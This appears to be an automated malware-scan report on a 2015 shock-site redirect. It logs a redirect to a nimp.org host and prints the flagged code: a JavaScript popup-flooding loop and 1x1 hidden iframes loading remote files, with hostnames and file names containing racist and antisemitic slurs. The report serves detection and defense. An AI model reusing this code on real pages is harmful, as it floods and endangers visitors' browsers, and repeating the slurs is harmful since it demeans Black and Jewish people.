Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=get-fucked.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://get-fucked.info/ | HTTP/1.1 302 Found Connection: close Date: Thu, 26 Feb 2015 12:06:07 GMT Location: http://niggers.on.nimp.org Server: Apache Content-Length: 210 Content-Type: text/html; charset=iso-8859-1 | clean |
http://niggers.on.nimp.org/ | 200 OK Content-Length: 31515 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function shellscript() { for(i = 0; i < 5; i++) { open('http://niggers.on.nimp.org/index.php?popup=1','_blank','scrollbar=no'); } } function main() { x.DOM.Script.execScript(shellscript.toString()); x.DOM.Script.setTimeout("shellscript()"); setTimeout("main()", 200); } Antivirus reports:
Hidden iFrame found. The same iFrame was found in 4 websites. size: 1x1 src: http://static.nimp.org/lm.pdf <iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/lm.pdf"> Hidden iFrame found. size: 1x1 src: http://static.nimp.org/jews.wmv <iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/jews.wmv"> Hidden iFrame found. size: 1x1 src: http://bosslegen.de/~andres/flood.html <iframe style="width: 1px; height: 1px;" src="http://bosslegen.de/~andres/flood.html"> | ||
http://niggers.on.nimp.org/test404page.js | 200 OK Content-Length: 31557 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function shellscript() { for(i = 0; i < 5; i++) { open('http://niggers.on.nimp.org/index.php?popup=1','_blank','scrollbar=no'); } } function main() { x.DOM.Script.execScript(shellscript.toString()); x.DOM.Script.setTimeout("shellscript()"); setTimeout("main()", 200); } Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://static.nimp.org/jews.wmv <iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/jews.wmv"> Hidden iFrame found. size: 1x1 src: http://bosslegen.de/~andres/flood.html <iframe style="width: 1px; height: 1px;" src="http://bosslegen.de/~andres/flood.html"> Hidden iFrame found. The same iFrame was found in 4 websites. size: 1x1 src: http://static.nimp.org/lm.pdf <iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/lm.pdf"> | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: get-fucked.info
Result:
HTTP/1.1 302 Found
Connection: close
Date: Thu, 26 Feb 2015 12:06:07 GMT
Location: http://niggers.on.nimp.org
Server: Apache
Content-Length: 210
Content-Type: text/html; charset=iso-8859-1
...210 bytes of data.
GET / HTTP/1.1
Host: get-fucked.info
Result:
HTTP/1.1 302 Found
Connection: close
Date: Thu, 26 Feb 2015 12:06:07 GMT
Location: http://niggers.on.nimp.org
Server: Apache
Content-Length: 210
Content-Type: text/html; charset=iso-8859-1
...210 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: get-fucked.info
Referer: http://www.google.com/search?q=get-fucked.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: get-fucked.info
Referer: http://www.google.com/search?q=get-fucked.info
Result:
The result is similar to the first query. There are no suspicious redirects found.